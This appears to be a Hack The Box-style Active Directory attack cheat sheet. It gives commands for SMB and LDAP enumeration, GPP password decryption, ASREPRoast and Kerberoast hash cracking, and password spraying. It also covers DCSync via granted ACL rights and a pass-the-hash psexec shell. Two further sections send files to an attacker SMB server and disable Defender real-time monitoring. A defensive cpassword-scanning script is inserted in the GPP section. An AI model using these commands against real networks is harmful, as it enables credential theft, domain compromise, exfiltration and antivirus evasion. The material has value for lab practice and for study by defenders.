Initial access

SMB Enumeration

smbmap -H 10.10.10.100
smbmap -H 10.10.10.100 -R # recursive
smbmap -H 10.10.10.192 -u null
smbmap -H 10.10.10.100 -d domain.local -u USERNAME -p PASSWORD

smbclient \\\\10.10.10.169\\NETLOGON -U 'melanie'%'Welcome123!'

If the GPO Policies share is readable, search for cpassword attributes in "domain.local/Policies/{xx-xx-xx}/MACHINE/Preferences/Groups/Groups.xml" and decrypt them with

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
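As an added defensive check (not part of the original cheat sheet), the following script audits a Policies tree for the cpassword attributes that gpp-decrypt consumes, so the affected preference items can be removed from SYSVOL. The sample Groups.xml and the GUID folder name are constructed, and the set of file names is assumed to be the preference types covered by MS14-025.

```python
import tempfile
import xml.etree.ElementTree as ET
from pathlib import Path

# Preference files that may carry a cpassword attribute (assumed MS14-025 scope).
GPP_FILES = {"groups.xml", "services.xml", "scheduledtasks.xml",
             "datasources.xml", "drives.xml", "printers.xml"}

# Constructed sample Groups.xml with a stored local-account password.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="svc_backup" status="svc_backup">
    <Properties action="U" cpassword="CONSTRUCTED-BASE64-BLOB"
      changeLogon="0" neverExpires="1" userName="svc_backup"/>
  </User>
</Groups>
"""

def find_cpasswords(xml_text, source="<memory>"):
    """One (source, tag, account, blob_length) per element carrying cpassword."""
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        if "cpassword" in elem.attrib:  # an empty value is still reported
            # The account name lives in different attributes per preference type.
            account = (elem.attrib.get("userName") or elem.attrib.get("accountName")
                       or elem.attrib.get("runAs") or "?")
            findings.append((source, elem.tag, account, len(elem.attrib["cpassword"])))
    return findings

def scan_sysvol(policies_dir):
    """Walk a Policies tree (local path or mounted SYSVOL copy) for GPP files."""
    findings = []
    for path in Path(policies_dir).rglob("*"):
        if path.name.lower() not in GPP_FILES:
            continue
        try:  # utf-8-sig strips the BOM that GPP files usually start with
            findings.extend(find_cpasswords(path.read_text(encoding="utf-8-sig"), str(path)))
        except ET.ParseError:
            continue  # malformed XML: skip rather than abort the whole scan
    return findings

def demo():
    """Write the sample into a throwaway Policies tree and scan it."""
    with tempfile.TemporaryDirectory() as root:
        gpo = Path(root, "Policies", "{CONSTRUCTED-GUID}", "MACHINE", "Preferences", "Groups")
        gpo.mkdir(parents=True)
        (gpo / "Groups.xml").write_text(SAMPLE_GROUPS_XML, encoding="utf-8")
        return scan_sysvol(root)
```

Each finding reports where the attribute sits and how long the stored blob is, which is enough to locate and remove the item; it does not decrypt anything.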

ASREPRoast

Find users that do not require Kerberos pre-authentication.
For such a user we can send an AS-REQ to the DC without knowing the password; the AS-REP comes back with a part encrypted under the user's password-derived key, which can be cracked offline:

python3 GetNPUsers.py domain.local/ -usersfile users.txt -dc-ip=10.10.10.161 -format hashcat -outputfile hash
hashcat -m 18200 --force -a 0 hash /usr/share/wordlists/rockyou.txt

Kerberoast

python3 GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS -outputfile hashes
john hashes --wordlist=/usr/share/wordlists/rockyou.txt --format=krb5tgs

enum4linux

enum4linux -a 10.10.10.175

Rpcclient

rpcclient -U "" -N 10.10.10.169
enumdomusers
querydispinfo

ldapsearch

ldapsearch -H ldap://EGOTISTICAL-BANK.LOCAL:389/ -x -s base -b '' "(objectClass=*)" "*" +

ldapdomaindump

ldapdomaindump -u 'domain.local\user' -p PASSWORD 10.10.10.103 -o ldap/
ldapdomaindump ldap://10.10.10.100:389 -u 'domain.local\user' -p 'PASSWORD' -at SIMPLE

DNS enumeration

dig srv _ldap._tcp.dc._msdcs.DOMAIN.LOCAL @10.10.10.175

kerbrute

kerbrute userenum -d domain.LOCAL xato-net-10-million-usernames.txt --dc 10.10.10.175

Password enumeration

hydra -L users.txt -P /usr/share/wordlists/rockyou.txt 10.10.10.175 ldap2 -V -f
crackmapexec smb 10.10.10.169 -u users.txt -p 'Welcome123!' --continue-on-success

Privesc

Enumeration tools

winPEAS
PrivescCheck

Change passwords of users with higher privileges

rpcclient //site.dom.local -U dom.local/USERNAME%PASSWORD
setuserinfo2 username 23 password

DCSync attack

Requires a session on a domain-joined host.
With PowerView, list the principals whose ACL on the domain object grants replication rights, GenericAll or WriteDacl (any of these can be used to grant DCSync):

Get-ObjectAcl -DistinguishedName "dc=domain,dc=local" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ActiveDirectoryRights -match 'WriteDacl')} | foreach{get-adobject -identity $_.SecurityIdentifier}
net group "Exchange Windows Permissions" xnull /add /domain
$pass = convertto-securestring 'password-1234' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('htb\xnull', $pass)
Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity "xnull" -Rights DCSync

Then remotely:

python3 secretsdump.py xnull:password-1234@10.10.10.161
python3 psexec.py forest.htb.local/administrator@10.10.10.161 -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6

Exfiltration

SMB Server

On the attacker machine:

smbserver.py share . -smb2support -username xnull -password xnull

On the victim machine:

net use \\10.10.14.6\share /u:xnull xnull
copy 20191018035324_BloodHound.zip \\10.10.14.6\share\

AV Bypass

Disable real-time monitoring

Set-MpPreference -DisableRealtimeMonitoring $true

Exclusion paths

Get-MpPreference | Select-Object -Property ExclusionPath -ExpandProperty ExclusionPath

Last modified: November 5, 2022